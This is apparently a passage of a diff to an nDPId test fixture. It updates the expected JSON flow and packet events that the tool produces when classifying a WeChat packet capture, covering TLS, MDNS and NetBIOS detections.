+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1492167765657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765657,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8ZwNAAEAGsjDAqAFny82Tq+K1Abs3CyvvAAAAAKACchAf3gAAAgQFtAQCCAoAMkzsAAAAAAEDAwc="} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1492167765701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765701,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rSlk19z2E29o6ASN8g4AQAAAgQFoAQCCApF8qRxADJMtAEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1492167765701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167765701,"pkt":"8IQvSpdgeJKcD6iOCABFAAA08RdAAEAGKCTAqAFny82Tq+K0AbvYTb2jpZNfdIAQAOWdWQAAAQEICgAyTPdF8qRx"} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167765433,"flow_last_seen":1492167765701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167765701,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1225,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1492167765933,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765933,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rU+QocNNwsr8KASN8h9cwAAAgQFoAQCCApFrtG3ADJM7AEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1226,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1492167765933,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167765933,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ZwRAAEAGsjfAqAFny82Tq+K1Abs3CyvwPkKHDoAQAOXiyQAAAQEICgAyTTFFrtG3"} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167617248,"flow_last_seen":1492167640200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167617498,"flow_last_seen":1492167640214,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167617498,"flow_last_seen":1492167640214,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1258,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167776953,"flow_last_seen":1492167776953,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167776953,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1258,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1492167776953,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167776953,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8k9VAAEAGhV7AqAFny82Tq+K2AbuZa8QhAAAAAKACchAaQgAAAgQFtAQCCAoAMlf0AAAAAAEDAwc="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1259,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167777204,"flow_last_seen":1492167777204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167777204,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1259,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1492167777204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777204,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8XvpAAEAGujnAqAFny82Tq+K3Abv08QbJAAAAAKACchB71AAAAgQFtAQCCAoAMlgzAAAAAAEDAwc="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1492167777220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777220,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rYX2Lh9mWvEIqASN8j8PgAAAgQFoAQCCApF00IlADJX9AEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1492167777220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167777220,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0k9ZAAEAGhWXAqAFny82Tq+K2AbuZa8QiF9i4foAQAOVhlwAAAQEICgAyWDdF00Il"} 
+00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1264,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167776953,"flow_last_seen":1492167777221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167777221,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1265,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1492167777476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777476,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74reza+A99PEGyqASN8j\/yAAAAgQFoAQCCApFrtz+ADJYMwEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1492167777476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167777476,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0XvtAAEAGukDAqAFny82Tq+K3Abv08QbKs2vgPoAQAOVlIAAAAQEICgAyWHdFrtz+"} 
+00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1268,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1270,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167619048,"flow_last_seen":1492167654504,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167782480,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167619048,"flow_last_seen":1492167654504,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167782480,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788126,"flow_last_seen":1492167788126,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167788126,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1492167788126,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492167788126,"pkt":"AQBeAAD70CeIF3AECABFoABEPYcAAAER2HrAqAFk4AAA+xTpFOkAMOibAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 
00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788126,"flow_last_seen":1492167788126,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167788126,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 
@@ -403,19 +402,20 @@ 00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795292,"flow_last_seen":1492167795292,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1492167795292,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1375,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1492167795294,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1492167795294,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoABOQdEAAIARc3rAqAFkwKgB\/wCJAIkAOgw8\/wABEAABAAAAAAAAIEVORURGS0ZFRU5GQUVMRURDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1376,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1492167795295,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1492167795295,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoABOQdIAAIARc3nAqAFkwKgB\/wCJAIkAOio7\/wEBEAABAAAAAAAAIEVERUJFT0ZERUJGQkVERkJDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} 
+00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1383,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1492167639887,"flow_last_seen":1492167667658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":39199,"flow_avg_l4_payload_len":536,"midstream":0,"thread_ts_msec":1492167796728,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167802662,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167802662,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1395,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1492167815567,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"thread_ts_msec":1492167815567,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj9sAAAEC8bDAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1398,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1492167820408,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167820408,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} -00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167648494,"flow_last_seen":1492167695538,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167648494,"flow_last_seen":1492167695538,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167640138,"flow_last_seen":1492167695550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167640138,"flow_last_seen":1492167695550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167648494,"flow_last_seen":1492167695538,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167648494,"flow_last_seen":1492167695538,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 